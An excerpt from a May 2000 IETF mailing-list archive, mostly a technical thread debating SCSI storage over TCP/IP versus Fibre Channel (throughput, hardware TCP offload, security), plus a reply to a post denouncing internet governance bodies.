<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>Too slow? If that were true, we wouldn't be =
able to=20
handle OC-192, would we? The real question is =
</SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>how much the chips, switch fabric and =
specialized=20
memory will cost, and how competitive this=20
will</SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>be with existing technologies such as Fibre =
Channel,=20
both for short and long haul. </SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000></SPAN></FONT></FONT><FONT size=3D2><FONT=20
face=3DArial><SPAN class=3D073584905-26052000><FONT=20
color=3D#0000ff> </FONT></SPAN></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><SPAN =
class=3D073584905-26052000><FONT=20
color=3D#0000ff>></FONT></SPAN>c. The maximum throughput of a =
GE TCP/IP=20
connection is 768 Mps, which is too slow to support storage I/O =
operations.<FONT=20
color=3D#0000ff><SPAN=20
class=3D073584905-26052000> </SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000></SPAN></FONT></FONT></FONT> </DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>That figure was achieved with minimal =
hardware=20
acceleration. Pushing it by an order of magnitude within 24=20
months</SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>is not unimaginable. If you were willing to =
throw more=20
hardware at the problem, it might be possible to=20
handle</SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>a 1 Gbps bit rate on 8 lambdas at the same =
time=20
*today*. How does 8 Gbps of throughput today sound, with 80=20
Gbps</SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>in 18-24 months? =
</SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000></SPAN></FONT></FONT></FONT> </DIV>
<DIV><FONT size=3D2><FONT face=3DArial><SPAN =
class=3D073584905-26052000><FONT=20
color=3D#0000ff> > </FONT></SPAN>Is any of this true?<FONT=20
color=3D#0000ff><SPAN=20
class=3D073584905-26052000> </SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000></SPAN></FONT></FONT></FONT> </DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>No.</SPAN></FONT></FONT></FONT></DIV></BODY></=
HTML>
------=_NextPart_000_0002_01BFC69D.F89E9210--
>From owner-ietf-outbound Fri May 26 07:51:00 2000
Received: by ietf.org (8.9.1a/8.9.1a) id HAA12737
for [EMAIL PROTECTED]; Fri, 26 May 2000 07:50:02 -0400 (EDT)
Received: from camaleon.lander.es ([212.95.212.2])
by ietf.org (8.9.1a/8.9.1a) with SMTP id HAA12693
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 07:40:00 -0400 (EDT)
Received: (qmail 24998 invoked from network); 26 May 2000 11:39:59 -0000
Received: from lince.lander.es (195.76.46.35)
by camaleon.lander.es with SMTP; 26 May 2000 11:39:59 -0000
Received: (qmail 20928 invoked from network); 26 May 2000 11:39:56 -0000
Received: from ppp-47-117.lander.es (HELO salva) (195.76.47.117)
by lince.lander.es with SMTP; 26 May 2000 11:39:56 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32)
Date: Fri, 26 May 2000 13:47:03 +0200
To: Bob Allisat <[EMAIL PROTECTED]>
From: Salvador Vidal <[EMAIL PROTECTED]>
Subject: Re: IETF *is* computer crime.
Cc: [EMAIL PROTECTED]
In-Reply-To: <Pine.LNX.4.21.0005231110070.30390-100000@mansfield>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Hello Bob,
For Internet improvent and sucess you need the people at this list,
Not because their are brillant
Not because their experince
Not because Intenet need continuity
...
Just because Nobody hate more the actual Intenet degradation, Nobody wants
more that Internet serves for humanity sucess than those who spend their
life working for Internet.
The bill of rights or any other thing that you have in mind are just wet
papers without people fighting for them, and you are in the right place if
you are searching for these people.
As you say the problem is the superestructure that drives Internet for a
very particular ecomic interest, IEFT people are not the problem but part
of the solution.
We need people at this list for an honest Internet evolution, for the
Internet Spirit revival...
We are driven to a deal to balance the actual situation but not without
them, not without you, not without anybody.
Very nice to heard from you again,
Salva
At 11:31 23/05/00 -0400, you wrote:
>
> The manner in which unsanctioned anti-democratic organizations
> control what amounts to the global communications network is a
> crime unto itself. Citizens utilizing this infra-structure posses
> no legal protections, no constitutional safeguards and no basic
> rights or liberties of any variety. We are subject to the chimeric
> whims of technocrats lost in the clouds of their stock options,
> fancy job titles and droll rotation of globe hopping symposiums
> and conferences. Left with no protections we are virtually
> helpless, hapless and hopeless.
>
> The concept of privacy and personal rights and freedoms on the
> net are fully nul and void. The whole convoluted mess rambles on
> generating profits for the lever-controllers and box managers
> and everything is fine and dandy. Except for the pervading fact
> that bloody security, mechanical network integrity and smooth
> technical functioning of the machinery do not supercede precious
> inalienables and undeniables. Except for the truth that people
> and their intercourses are openly, randomly and completely subject
> to limitless interferances and interventions.
>
> IETF, ISOC, ICANN, ITU and whatever other unsanctioned, informal
> acretion of pseudo-authority should arise are no places to look
> for solutions. They embody the problem. They ARE the proble. To
> search elsewhere is our only alternative. Tou route around, to
> undermine, to quietly innovate clever detours and innovations.
> Because the moment the unchanging cast of central authorites
> are deposed is the moment a solution becomes workable. Look no
> further than your own self, your own capabilities and capacities.
> Anyone who seeks freedom or solace from those who benifit the most
> from our control and the maintenance of their influence can only
> impede evolution.
>
> Alive and very much well, all my opinions only, a very insignificant
> observer among the masses of the great unplugged, I remain,
>
> Bob Allisat
>
>
>
>From owner-ietf-outbound Fri May 26 08:50:27 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA13939
for [EMAIL PROTECTED]; Fri, 26 May 2000 08:50:03 -0400 (EDT)
Received: from ece.cmu.edu (ECE.CMU.EDU [128.2.236.200])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA13705
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 08:40:09 -0400 (EDT)
Received: from yogi.ece.cmu.edu (IDENT:[EMAIL PROTECTED] [128.2.252.128])
by ece.cmu.edu (8.9.2/8.8.8) with ESMTP id IAA10486;
Fri, 26 May 2000 08:40:09 -0400 (EDT)
Received: from yogi.ece.cmu.edu (bassoon@localhost [127.0.0.1])
by yogi.ece.cmu.edu (8.8.7/8.8.7) with ESMTP id IAA11319;
Fri, 26 May 2000 08:40:08 -0400
Message-Id: <[EMAIL PROTECTED]>
To: "'Jon William Toigo'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: "HAAGENS,RANDY (HP-Roseville,ex1)": RE: IETF mailing list question on Storage
over Ethernet/IP
Date: Fri, 26 May 2000 08:40:08 -0400
From: Dave Nagle <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
Jon,
A few more comments on SCSI over IP.
Also, anyone interested in this subject can subscribe to the IPS
reflector? Info on the IPS reflector:
IPS
Name: IP Storage
Purpose: Semi-official reflector for the IETF IPSWG communication. Postings
are made following "authors group" consensus.
Hosted by: CMU
Subscribe: Send mail to [EMAIL PROTECTED] with the command subscribe ips
E-mail: [EMAIL PROTECTED]
URL: http://www.ece.cmu.edu/~ips
------- Forwarded Message
Date: Thu, 25 May 2000 21:38:11 -0700
From: "HAAGENS,RANDY (HP-Roseville,ex1)" <[EMAIL PROTECTED]>
To: "'Dave Nagle'" <[EMAIL PROTECTED]>
cc: "Scsi-Tcp (E-mail)" <[EMAIL PROTECTED]>
Subject: RE: IETF mailing list question on Storage over Ethernet/IP
Comments
- --------
1. I agree with your comments about TCP's being implemented in hardware. It
will be as fast as any other protocol implemented in hardware.
2. Adaptec should speak for themselves; but I believe that the reference to
STP is a misunderstanding. At the N+I conference, Adaptec demoed a software
prototype of their SCSI Encapsulation Protocol (SEP). SEP allows SCSI to be
transported over a lightweight protocol of Adaptec's own design for the the
local area, or over TCP for the wide area.
3. The IP Storage Working Group (IBM, Cisco, HP, Adaptec, Quantum, EMC, and
others) are working on a mapping of SCSI to TCP, for use both in the WAN and
in the LAN. All of us agree on the use of TCP as the transport for the WAN
and LAN, while a minority would probably favor using a lighter-weight
transport for the LAN.
In summary, TCP is suitable as the transport for the WAN and LAN, and it
will be as fast as any protocol when implemented in hardware. Using a
single transport for the WAN and LAN removes the artificial barrier between
these two environments, and means that applications (like mirroring) can be
designed to scale seamlessly from the local to the wide area.
Randy Haagens
Networked Storage Architecture
Storage Organization
Hewlett-Packard Co.
e-mail: [EMAIL PROTECTED]
tel: +1 916 785 4578
fax: +1 916 785 1911
> -----Original Message-----
> From: Dave Nagle [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 25, 2000 4:28 PM
> To: SCSI-over-TCP List
> Subject: IETF mailing list question on Storage over Ethernet/IP
>
>
>
>
> ------- Forwarded Message
>
> Date: Thu, 25 May 2000 22:55:49 -0000
> From: Mike Fisk <[EMAIL PROTECTED]>
> To: Jon William Toigo <[EMAIL PROTECTED]>
> cc: [EMAIL PROTECTED]
> Subject: Re: Storage over Ethernet/IP
>
> On Thu, 25 May 2000, Jon William Toigo wrote:
>
> > I am seeking a few points of clarification:
> >
> > 1. Fibre Channel folks have attempted to explain to me why TCP/IP
> > could NEVER be a viable interconnect for block level storage
> > operations. They claim:
> >
> > a. TCP is too CPU intensive and creates too much latency
> for storage
> > I/O operations.
> >
> > b. The IP stack is too top heavy and processing packet
> headers is too
> > slow to support storage I/O operations.
> >
> > c. The maximum throughput of a GE TCP/IP connection is 768
> Mps, which
> > is too slow to support storage I/O operations.
>
> This is not a theoretical limitation, but is in the ballpark
> reported by
> many general-purpose operating systems with commodity hardware.
>
> >Is any of this true?
>
> I don't believe that TCP/IP implementations couldn't be optimized to
> support full link rate and low latency. If you're building a hardware
> adapter that can do SCSI and RAID fast, adding TCP shouldn't be
> prohibitively hard.
>
> > 2. Adaptec has posited a replacement for TCP called STP
> for use as a
> > transport for storage. Does anyone know anything about this?
>
> STP is the Scheduled Transfer protocol being standardized by
> the ANSI T11
> folks. ST was designed to run on top of GSN (a.k.a.
> HIPPI-6400). In my
> opinion, it is as heavy-weight as TCP with respect to most of
> the things
> stated above. It does have the potential advantage of being
> designed from
> scratch to support zero-copy access to user space using specialized
> interface cards.
>
> > 3. Current discussions of the SCSI over IP protocol seem to ignore
> > the issue of TCP or any other transport protocol. Does anyone know
> > definitively what transport is being suggested by the
> IBM/Cisco crowd?
>
> I believe the assumption is that you will have a local network with no
> packet loss or significant bit error rate. Basically, you assume that
> your ethernet is as reliable as your SCSI cable or
> fiber-channel network.
> For a well engineered, fully-switched LAN, that may be a reasonable
> assumption.
>
> - -- Mike Fisk, RADIANT Team, Network Engineering Group, Los
> Alamos National
> Lab See http://home.lanl.gov/mfisk/ for contact information
>
>
> ------- End of Forwarded Message
>
>
>From owner-ietf-outbound Fri May 26 09:00:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA14145
for [EMAIL PROTECTED]; Fri, 26 May 2000 09:00:03 -0400 (EDT)
Received: from ece.cmu.edu (ECE.CMU.EDU [128.2.236.200])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA13729
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 08:42:40 -0400 (EDT)
Received: from yogi.ece.cmu.edu (IDENT:[EMAIL PROTECTED] [128.2.252.128])
by ece.cmu.edu (8.9.2/8.8.8) with ESMTP id IAA10550;
Fri, 26 May 2000 08:42:41 -0400 (EDT)
Received: from yogi.ece.cmu.edu (bassoon@localhost [127.0.0.1])
by yogi.ece.cmu.edu (8.8.7/8.8.7) with ESMTP id IAA11351;
Fri, 26 May 2000 08:42:39 -0400
Message-Id: <[EMAIL PROTECTED]>
To: "'Jon William Toigo'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: IETF mailing list question on Storage over Ethernet/IP
Date: Fri, 26 May 2000 08:42:39 -0400
From: Dave Nagle <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
A few comments about this one.
1. FC does not provide reliable transmission. It provides for error
detection, but escalates recovery to "upper level protocol". FCP-2 has
improved this situation, but is not widely implemented yet. One of the
advantages of using a transport such as TCP is that link errors will be
corrected in a manner that is transparent to the application protocol
(SCSI).
2. Jumbo frames will not be necessary when TCP is implemented in hardware.
Most FC implementations use 1024 byte frames, and performance is very
adequate, given hardware implementation of FCP.
3. The cost of using different transport protocols in the LAN and WAN is
that the two will not interoperate. Many of us believe that TCP has proven
itself in both the LAN and WAN. I bet your PC or UN*X workstation is using
TCP for all its protocol needs.
4. The IPS working group is mapping SCSI to TCP. Another working group is
mapping FC to IP. These are very different approaches. The first (ours)
preserves SCSI, but does not include any vestige of Fibre Channel. It is
intended for use in the LAN, MAN and WAN. Its best use is for connecting
hosts computers to storage controllers using Ethernet and IP WAN technology.
It will be possible, but non-trivial, to translate between SCSI over TCP/IP
and SCSI over Fibrechannel. The second is a tunneling scheme for extending
Fibre Channel over the IP WAN. It does not contemplate Ethernet-based hosts
or storage controllers.
5. Just about any reliable transport will do nicely for transporting SCSI
commands. We chose TCP because its implementation and behavior are
well-known, and it is well-supported with load-balancing, QoS and security
features. While another protocol (such as reliable datagram) might be
arguably better suited to storage transport applications, we'll use TCP
"because it's there". We'll have the benefit of all the other investment
that's going into improving TCP for internet uses.
Randy Haagens
Networked Storage Architecture
Storage Organization
Hewlett-Packard Co.
e-mail: [EMAIL PROTECTED]
tel: +1 916 785 4578
fax: +1 916 785 1911
> -----Original Message-----
> From: Dave Nagle [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 25, 2000 4:29 PM
> To: SCSI-over-TCP List
> Subject: IETF mailing list question on Storage over Ethernet/IP
>
>
>
> ------- Forwarded Message
>
> Date: Thu, 25 May 2000 19:27:02 -0400
> From: Dave Nagle <[EMAIL PROTECTED]>
> To: "Jon William Toigo" <[EMAIL PROTECTED]>
> cc: [EMAIL PROTECTED]
> Subject: Re: Storage over Ethernet/IP
>
> Jon,
>
> Original Message
> - ----------------
> >> I am seeking a few points of clarification:
> >>
> >> 1. Fibre Channel folks have attempted to explain to me
> why TCP/IP could =
> >> NEVER be a viable interconnect for block level storage
> operations. They =
> >> claim:
> >> a. TCP is too CPU intensive and creates too much latency
> for storage =
> >> I/O operations.
> >> b. The IP stack is too top heavy and processing packet
> headers is too =
> >> slow to support storage I/O operations.
>
> There is a lot of work to show that this is not true. Check out Van
> Meter's 1998 ASPLOS paper "VISA - Netstations virtual internet SCSI
> adaptor."
>
> Perhaps more importantly, there are many companies that are building
> TCP in silicon ASICs. This should make TCP's performance comparable
> to Fibre Channel. Both TCP/IP and FC provide about the same
> functionality ... reliable, in-order transmission.
>
> The bottom line is that FC is done in hardware while TCP has
> traditionally been done in software. Therefore, previous performance
> numbers are not going to be fair. Once TCP is in silicon, its
> performance should be roughly equal to FC.
>
> >> c. The maximum throughput of a GE TCP/IP connection is
> 768 Mps, which =
> >> is too slow to support storage I/O operations.
>
> I believe there are higher numbers (especially with Jumbo
> Frames). Alteon's web site show's 920 Mbps. Microsoft and Duke
> University have both shown TCP performance o 1Gb+/s performance over
> other networks.
>
> BTW, why is 768 Mbps too slow for storage. Many apps (e.g.,
> transaction workloads) are I/O's per second bound, not bandwidth
> bound. Also, even if storage over IP/ether is a bit slower than FC,
> the benefits of leveraging IP's infrastructure (i.e., routers,
> switches, NICs, network management, networking people) is a huge
> advantage.
>
> There is also the issue of SCSI over TCP/IP in the SAN vs. the
> LAN/WAN. Some companies, focusing on the SAN, are building
> SCSI/lightweight transport/IP while others, focusing on the WAN,
> propose SCSI/TCP/IP. It may be the case that SAN and WAN traffic use
> different transport protocols to gain a bit of extra performance in
> the SAN.
>
> >> Is any of this true?
> >>
> >> 2. Adaptec has posited a replacement for TCP called STP
> for use as a =
> >> transport for storage. Does anyone know anything about this?
>
> From Paul von Stamwitz's posting to the ips mailing list ...
>
> The link to the SEP draft is
> http://www.ietf.org/internet-drafts/draft-wilson-sep-00.txt
>
> The press release is at:
> http://www.adaptec.com/adaptec/press/release000504.html
>
> The demo shows a Gb ethernet controller transporting SCSI
> traffic to several
> targets through an off-the-shelf 100TX switch with a Gb
> uplink. The targets
> are ethernet to U160 SCSI bridges with one or more SCSI
> drives attached. The
> host controller runs under NT4.0 at appears to the OS as
> a SCSI host bus
> adapter.
>
> The architecture is based on Adaptec's SCSI Encapsulation Protocol
> (SEP). SEP is mapped on top of TCP/IP or a light-weight transport
> protocol specifically designed for SANs.
>
> An SEP overview was presented at the IPS BOF in Adelaide
> last month and an
> internet draft on SEP was submitted to IETF this week. I
> will forward the
> link as soon as it becomes available. This draft is informational
> only and intended to aid in this group's work toward an industry
> standard SCSI transport protocol over IP networks.
>
>
> >> 3. Current discussions of the SCSI over IP protocol seem
> to ignore the =
> >> issue of TCP or any other transport protocol. Does anyone know =
> >> definitively what transport is being suggested by the
> IBM/Cisco crowd?
>
> Current SCSI over IP discussions are not ignoring TCP ... they are
> definitely considering TCP as the primary transport. See the ips
> web site at:
>
http://www.ece.cmu.edu/~ips
>>
>> 4. Another storage company is looking at Reliable UDP as a substitute =
>> for TCP in storage data transfers. Where can I learn more about this =
>> protocol, which I am told was introduced many years ago by Cisco?
Companies to look at include:
nishansystems.com
interprophet.com
san.com
arkresearch.com
Also, I believe that the IETF IP over FC working group is now
looking at FC over IP.
dave...........
David Nagle
Director, Parallel Data Lab
Senior Reseach Computer Scientist
School of Computer Science
Carnegie Mellon University
Pittsburgh, PA 15213
412-268-3898 (office)
412-268-3890 (fax)
http://www.ece.cmu.edu/~bassoon
- ------- End of Forwarded Message
>From owner-ietf-outbound Fri May 26 10:30:38 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA16324
for [EMAIL PROTECTED]; Fri, 26 May 2000 10:30:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA16191
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 10:23:07 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id KAA28467;
Fri, 26 May 2000 10:23:06 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: "Jon William Toigo" <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Thu, 25 May 2000 17:52:14 EDT."
<06d001bfc693$7f18ff20$dd9cfea9@jtoigo>
Date: Fri, 26 May 2000 10:23:06 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
None of the cited limitations of TCP performance are true.
they are also missing the point.
If you're going to run storage access over IP then you are potentially
allowing it to be run over the global Internet. If you do that you need
good authentication and privacy, and (if you try to do them in software)
authentication and encyption will eat far more in performance than
anything inherent to TCP or IP.
and no, it's not acceptable to assume that the storage device will be
behind a firewall.
Keith
>From owner-ietf-outbound Fri May 26 10:40:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA16676
for [EMAIL PROTECTED]; Fri, 26 May 2000 10:40:02 -0400 (EDT)
Received: from c014.sfo.cp.net (c014-h014.c014.sfo.cp.net [209.228.12.78])
by ietf.org (8.9.1a/8.9.1a) with SMTP id KAA16432
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 10:31:29 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: (cpmta 20698 invoked from network); 26 May 2000 07:30:59 -0700
Date: 26 May 2000 07:30:59 -0700
Message-ID: <[EMAIL PROTECTED]>
X-Sent: 26 May 2000 14:30:59 GMT
Received: from [198.102.173.112] by mail.lightel.com with HTTP;
26 May 2000 07:30:58 PDT
Content-Type: text/plain
Content-Disposition: inline
Mime-Version: 1.0
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
X-Mailer: Web Mail 3.6.3.1
Subject: Re: IETF mailing list question on Storage over Ethernet/IP
X-Loop: [EMAIL PROTECTED]
Thank you all for some excellent discussions on the subject. For all the reasons
mentioned, I am mapping TCP/IP to DWDM to create very high performance SANs. I hope
to share more on this as we progress and launch products. You can see more on this at
www.lightel.com.
On Fri, 26 May 2000, Dave Nagle wrote:
>
>
> A few comments about this one.
>
> 1. FC does not provide reliable transmission. It provides for error
> detection, but escalates recovery to "upper level protocol". FCP-2 has
> improved this situation, but is not widely implemented yet. One of the
> advantages of using a transport such as TCP is that link errors will be
> corrected in a manner that is transparent to the application protocol
> (SCSI).
>
> 2. Jumbo frames will not be necessary when TCP is implemented in hardware.
> Most FC implementations use 1024 byte frames, and performance is very
> adequate, given hardware implementation of FCP.
>
> 3. The cost of using different transport protocols in the LAN and WAN is
> that the two will not interoperate. Many of us believe that TCP has proven
> itself in both the LAN and WAN. I bet your PC or UN*X workstation is using
> TCP for all its protocol needs.
>
> 4. The IPS working group is mapping SCSI to TCP. Another working group is
> mapping FC to IP. These are very different approaches. The first (ours)
> preserves SCSI, but does not include any vestige of Fibre Channel. It is
> intended for use in the LAN, MAN and WAN. Its best use is for connecting
> hosts computers to storage controllers using Ethernet and IP WAN technology.
> It will be possible, but non-trivial, to translate between SCSI over TCP/IP
> and SCSI over Fibrechannel. The second is a tunneling scheme for extending
> Fibre Channel over the IP WAN. It does not contemplate Ethernet-based hosts
> or storage controllers.
>
> 5. Just about any reliable transport will do nicely for transporting SCSI
> commands. We chose TCP because its implementation and behavior are
> well-known, and it is well-supported with load-balancing, QoS and security
> features. While another protocol (such as reliable datagram) might be
> arguably better suited to storage transport applications, we'll use TCP
> "because it's there". We'll have the benefit of all the other investment
> that's going into improving TCP for internet uses.
>
> Randy Haagens
> Networked Storage Architecture
> Storage Organization
> Hewlett-Packard Co.
> e-mail: [EMAIL PROTECTED]
> tel: +1 916 785 4578
> fax: +1 916 785 1911
>
>
> > -----Original Message-----
> > From: Dave Nagle [mailto:[EMAIL PROTECTED]]
> > Sent: Thursday, May 25, 2000 4:29 PM
> > To: SCSI-over-TCP List
> > Subject: IETF mailing list question on Storage over Ethernet/IP
> >
> >
> >
> > ------- Forwarded Message
> >
> > Date: Thu, 25 May 2000 19:27:02 -0400
> > From: Dave Nagle <[EMAIL PROTECTED]>
> > To: "Jon William Toigo" <[EMAIL PROTECTED]>
> > cc: [EMAIL PROTECTED]
> > Subject: Re: Storage over Ethernet/IP
> >
> > Jon,
> >
> > Original Message
> > - ----------------
> > >> I am seeking a few points of clarification:
> > >>
> > >> 1. Fibre Channel folks have attempted to explain to me
> > why TCP/IP could =
> > >> NEVER be a viable interconnect for block level storage
> > operations. They =
> > >> claim:
> > >> a. TCP is too CPU intensive and creates too much latency
> > for storage =
> > >> I/O operations.
> > >> b. The IP stack is too top heavy and processing packet
> > headers is too =
> > >> slow to support storage I/O operations.
> >
> > There is a lot of work to show that this is not true. Check out Van
> > Meter's 1998 ASPLOS paper "VISA - Netstations virtual internet SCSI
> > adaptor."
> >
> > Perhaps more importantly, there are many companies that are building
> > TCP in silicon ASICs. This should make TCP's performance comparable
> > to Fibre Channel. Both TCP/IP and FC provide about the same
> > functionality ... reliable, in-order transmission.
> >
> > The bottom line is that FC is done in hardware while TCP has
> > traditionally been done in software. Therefore, previous performance
> > numbers are not going to be fair. Once TCP is in silicon, its
> > performance should be roughly equal to FC.
> >
> > >> c. The maximum throughput of a GE TCP/IP connection is
> > 768 Mps, which =
> > >> is too slow to support storage I/O operations.
> >
> > I believe there are higher numbers (especially with Jumbo
> > Frames). Alteon's web site show's 920 Mbps. Microsoft and Duke
> > University have both shown TCP performance o 1Gb+/s performance over
> > other networks.
> >
> > BTW, why is 768 Mbps too slow for storage. Many apps (e.g.,
> > transaction workloads) are I/O's per second bound, not bandwidth
> > bound. Also, even if storage over IP/ether is a bit slower than FC,
> > the benefits of leveraging IP's infrastructure (i.e., routers,
> > switches, NICs, network management, networking people) is a huge
> > advantage.
> >
> > There is also the issue of SCSI over TCP/IP in the SAN vs. the
> > LAN/WAN. Some companies, focusing on the SAN, are building
> > SCSI/lightweight transport/IP while others, focusing on the WAN,
> > propose SCSI/TCP/IP. It may be the case that SAN and WAN traffic use
> > different transport protocols to gain a bit of extra performance in
> > the SAN.
> >
> > >> Is any of this true?
> > >>
> > >> 2. Adaptec has posited a replacement for TCP called STP
> > for use as a =
> > >> transport for storage. Does anyone know anything about this?
> >
> > From Paul von Stamwitz's posting to the ips mailing list ...
> >
> > The link to the SEP draft is
> > http://www.ietf.org/internet-drafts/draft-wilson-sep-00.txt
> >
> > The press release is at:
> > http://www.adaptec.com/adaptec/press/release000504.html
> >
> > The demo shows a Gb ethernet controller transporting SCSI
> > traffic to several
> > targets through an off-the-shelf 100TX switch with a Gb
> > uplink. The targets
> > are ethernet to U160 SCSI bridges with one or more SCSI
> > drives attached. The
> > host controller runs under NT4.0 at appears to the OS as
> > a SCSI host bus
> > adapter.
> >
> > The architecture is based on Adaptec's SCSI Encapsulation Protocol
> > (SEP). SEP is mapped on top of TCP/IP or a light-weight transport
> > protocol specifically designed for SANs.
> >
> > An SEP overview was presented at the IPS BOF in Adelaide
> > last month and an
> > internet draft on SEP was submitted to IETF this week. I
> > will forward the
> > link as soon as it becomes available. This draft is informational
> > only and intended to aid in this group's work toward an industry
> > standard SCSI transport protocol over IP networks.
> >
> >
> > >> 3. Current discussions of the SCSI over IP protocol seem
> > to ignore the =
> > >> issue of TCP or any other transport protocol. Does anyone know =
> > >> definitively what transport is being suggested by the
> > IBM/Cisco crowd?
> >
> > Current SCSI over IP discussions are not ignoring TCP ... they are
> > definitely considering TCP as the primary transport. See the ips
> > web site at:
> >
> http://www.ece.cmu.edu/~ips
>
> >>
> >> 4. Another storage company is looking at Reliable UDP as a substitute =
> >> for TCP in storage data transfers. Where can I learn more about this =
> >> protocol, which I am told was introduced many years ago by Cisco?
>
> Companies to look at include:
>
> nishansystems.com
> interprophet.com
> san.com
> arkresearch.com
>
> Also, I believe that the IETF IP over FC working group is now
> looking at FC over IP.
>
>
>
> dave...........
>
> David Nagle
> Director, Parallel Data Lab
> Senior Reseach Computer Scientist
> School of Computer Science
> Carnegie Mellon University
> Pittsburgh, PA 15213
> 412-268-3898 (office)
> 412-268-3890 (fax)
> http://www.ece.cmu.edu/~bassoon
>
>
> - ------- End of Forwarded Message
>From owner-ietf-outbound Fri May 26 10:50:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA16869
for [EMAIL PROTECTED]; Fri, 26 May 2000 10:50:03 -0400 (EDT)
Received: from corpnt3.born.com (corpnt3.born.com [206.10.207.66])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA16714
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 10:41:02 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: by CORPNT3 with Internet Mail Service (5.5.2650.21)
id <LSP7BT3Y>; Fri, 26 May 2000 09:40:32 -0500
Message-ID: <A427D1278F7CD311B1670008C7FAA62AC89F1E@CORPNT3>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
Date: Fri, 26 May 2000 09:40:28 -0500
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Loop: [EMAIL PROTECTED]
Encryption will be offloaded to the network interface. ASICs on the NICs
will greatly improve encryption and authentication performance. It won't
run over the Internet because of latencies inherent on the public network.
It will run over incredibly fast Packet over SONET Wide Area
Networks--behind firewalls. OC-192 and soon-to-come OC-768 (terrabit)
switches will be the backbone of WANs and MANs of large networks in a few
years. Also, IPv6 has significantly improved authentication capabilities
that will help ensure security on the Storage WAN (SWAN?)
Brian
-----Original Message-----
From: Keith Moore [mailto:[EMAIL PROTECTED]]
Sent: Friday, May 26, 2000 9:23 AM
To: Jon William Toigo
Cc: [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
None of the cited limitations of TCP performance are true.
they are also missing the point.
If you're going to run storage access over IP then you are potentially
allowing it to be run over the global Internet. If you do that you need
good authentication and privacy, and (if you try to do them in software)
authentication and encyption will eat far more in performance than
anything inherent to TCP or IP.
and no, it's not acceptable to assume that the storage device will be
behind a firewall.
Keith
>From owner-ietf-outbound Fri May 26 11:10:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA17357
for [EMAIL PROTECTED]; Fri, 26 May 2000 11:10:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA17165
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 11:01:23 -0400 (EDT)
